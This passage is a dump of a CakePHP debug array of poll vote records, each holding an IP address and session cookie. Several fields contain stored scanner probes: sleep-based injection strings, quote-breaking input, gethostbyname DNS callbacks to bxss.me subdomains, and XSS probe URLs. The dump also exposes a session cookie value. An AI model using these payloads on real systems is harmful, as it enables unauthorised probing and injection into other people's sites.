'id' => '6516',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5974 => array(
'id' => '6517',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5975 => array(
'id' => '6518',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5976 => array(
'id' => '6519',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5977 => array(
'id' => '6520',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5978 => array(
'id' => '6521',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5979 => array(
'id' => '6522',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5980 => array(
'id' => '6523',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5981 => array(
'id' => '6524',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5982 => array(
'id' => '6525',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5983 => array(
'id' => '6526',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5984 => array(
'id' => '6527',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5985 => array(
'id' => '6528',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5986 => array(
'id' => '6529',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5987 => array(
'id' => '6530',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5988 => array(
'id' => '6531',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5989 => array(
'id' => '6532',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5990 => array(
'id' => '6533',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5991 => array(
'id' => '6534',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5992 => array(
'id' => '6535',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5993 => array(
'id' => '6536',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5994 => array(
'id' => '6537',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5995 => array(
'id' => '6538',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5996 => array(
'id' => '6539',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5997 => array(
'id' => '6540',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5998 => array(
'id' => '6541',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 5999 => array(
'id' => '6542',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6000 => array(
'id' => '6543',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6001 => array(
'id' => '6544',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6002 => array(
'id' => '6545',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6003 => array(
'id' => '6546',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6004 => array(
'id' => '6547',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6005 => array(
'id' => '6548',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6006 => array(
'id' => '6549',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6007 => array(
'id' => '6550',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6008 => array(
'id' => '6551',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6009 => array(
'id' => '6552',
'ip' => ''"()',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6010 => array(
'id' => '6553',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6011 => array(
'id' => '6554',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6012 => array(
'id' => '6555',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6013 => array(
'id' => '6556',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6014 => array(
'id' => '6557',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6015 => array(
'id' => '6558',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6016 => array(
'id' => '6559',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6017 => array(
'id' => '6560',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6018 => array(
'id' => '6561',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6019 => array(
'id' => '6562',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6020 => array(
'id' => '6563',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6021 => array(
'id' => '6564',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6022 => array(
'id' => '6565',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6023 => array(
'id' => '6566',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6024 => array(
'id' => '6567',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6025 => array(
'id' => '6568',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6026 => array(
'id' => '6569',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6027 => array(
'id' => '6570',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6028 => array(
'id' => '6571',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6029 => array(
'id' => '6572',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6030 => array(
'id' => '6573',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6031 => array(
'id' => '6574',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6032 => array(
'id' => '6575',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6033 => array(
'id' => '6576',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6034 => array(
'id' => '6577',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6035 => array(
'id' => '6578',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6036 => array(
'id' => '6579',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6037 => array(
'id' => '6580',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6038 => array(
'id' => '6581',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6039 => array(
'id' => '6582',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6040 => array(
'id' => '6583',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6041 => array(
'id' => '6584',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6042 => array(
'id' => '6585',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6043 => array(
'id' => '6586',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6044 => array(
'id' => '6587',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6045 => array(
'id' => '6588',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6046 => array(
'id' => '6589',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6047 => array(
'id' => '6590',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6048 => array(
'id' => '6591',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6049 => array(
'id' => '6592',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6050 => array(
'id' => '6593',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6051 => array(
'id' => '6594',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6052 => array(
'id' => '6595',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6053 => array(
'id' => '6596',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6054 => array(
'id' => '6597',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6055 => array(
'id' => '6598',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6056 => array(
'id' => '6599',
'ip' => 'https://scimat.dz/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6057 => array(
'id' => '6600',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6058 => array(
'id' => '6601',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6059 => array(
'id' => '6602',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6060 => array(
'id' => '6603',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6061 => array(
'id' => '6604',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6062 => array(
'id' => '6605',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6063 => array(
'id' => '6606',
'ip' => '85.190.233.47',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 6064 => array(
'id' => '6607',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6065 => array(
'id' => '6608',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6066 => array(
'id' => '6609',
'ip' => 'https://bxss.me',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6067 => array(
'id' => '6610',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6068 => array(
'id' => '6611',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6069 => array(
'id' => '6612',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6070 => array(
'id' => '6613',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'&&sleep(27*1000)*ojfcer&&'',
'sondage_id' => '2'
),
(int) 6071 => array(
'id' => '6614',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6072 => array(
'id' => '6615',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6073 => array(
'id' => '6616',
'ip' => 'https://bxss.me/',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6074 => array(
'id' => '6617',
'ip' => '85.190.233.47',
'ip1' => ''.gethostbyname(lc('hittw'.'hndslwre4bc4f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(72).chr(113).chr(75).'',
'sondage_id' => '2'
),
(int) 6075 => array(
'id' => '6618',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6076 => array(
'id' => '6619',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6077 => array(
'id' => '6620',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2"&&sleep(27*1000)*jfznbu&&"',
'sondage_id' => '2'
),
(int) 6078 => array(
'id' => '6621',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6079 => array(
'id' => '6622',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6080 => array(
'id' => '6623',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6081 => array(
'id' => '6624',
'ip' => 'https://bxss.me/\',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6082 => array(
'id' => '6625',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6083 => array(
'id' => '6626',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6084 => array(
'id' => '6627',
'ip' => '85.190.233.47',
'ip1' => '".gethostbyname(lc("hitvo"."zuykdrkh014b9.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(73).chr(120).chr(78)."',
'sondage_id' => '2'
),
(int) 6085 => array(
'id' => '6628',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6086 => array(
'id' => '6629',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2'||sleep(27*1000)*wimmke||'',
'sondage_id' => '2'
),
(int) 6087 => array(
'id' => '6630',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6088 => array(
'id' => '6631',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6089 => array(
'id' => '6632',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6090 => array(
'id' => '6633',
'ip' => '85.190.233.47',
'ip1' => 'gethostbyname(lc('hitqe'.'bhcgicgef646f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(88).chr(97).chr(87)',
'sondage_id' => '2'
),
(int) 6091 => array(
'id' => '6634',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6092 => array(
'id' => '6635',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6093 => array(
'id' => '6636',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2"||sleep(27*1000)*jcyfgh||"',
'sondage_id' => '2'
),
(int) 6094 => array(
'id' => '6637',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6095 => array(
'id' => '6638',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6096 => array(
'id' => '6639',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6097 => array(
'id' => '6640',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6098 => array(
'id' => '6641',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6099 => array(
'id' => '6642',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6100 => array(
'id' => '6643',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6101 => array(
'id' => '6644',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6102 => array(
'id' => '6645',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6103 => array(
'id' => '6646',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6104 => array(
'id' => '6647',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6105 => array(
'id' => '6648',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6106 => array(
'id' => '6649',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6107 => array(
'id' => '6650',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6108 => array(
'id' => '6651',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6109 => array(
'id' => '6652',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6110 => array(
'id' => '6653',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6111 => array(
'id' => '6654',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6112 => array(
'id' => '6655',
'ip' => '85.190.233.47',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 6113 => array(
'id' => '6656',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6114 => array(
'id' => '6657',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6115 => array(
'id' => '6658',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6116 => array(
'id' => '6659',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6117 => array(
'id' => '6660',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6118 => array(
'id' => '6661',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6119 => array(
'id' => '6662',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6120 => array(
'id' => '6663',
'ip' => '85.190.233.47',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 6121 => array(
'id' => '6664',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6122 => array(
'id' => '6665',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6123 => array(
'id' => '6666',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6124 => array(
'id' => '6667',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6125 => array(
'id' => '6668',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6126 => array(
'id' => '6669',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6127 => array(
'id' => '6670',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6128 => array(
'id' => '6671',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6129 => array(
'id' => '6672',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6130 => array(
'id' => '6673',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6131 => array(
'id' => '6674',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6132 => array(
'id' => '6675',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6133 => array(
'id' => '6676',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6134 => array(
'id' => '6677',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6135 => array(
'id' => '6678',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6136 => array(
'id' => '6679',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6137 => array(
'id' => '6680',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6138 => array(
'id' => '6681',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6139 => array(
'id' => '6682',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6140 => array(
'id' => '6683',
'ip' => '85.190.233.47',
'ip1' => 'CAKEPHP=156cb98a2d4ae2214af720d8264bafe2',
'sondage_id' => '2'
),
(int) 6141 => array(
'id' => '6684',
'ip' => '85.190.233.47',
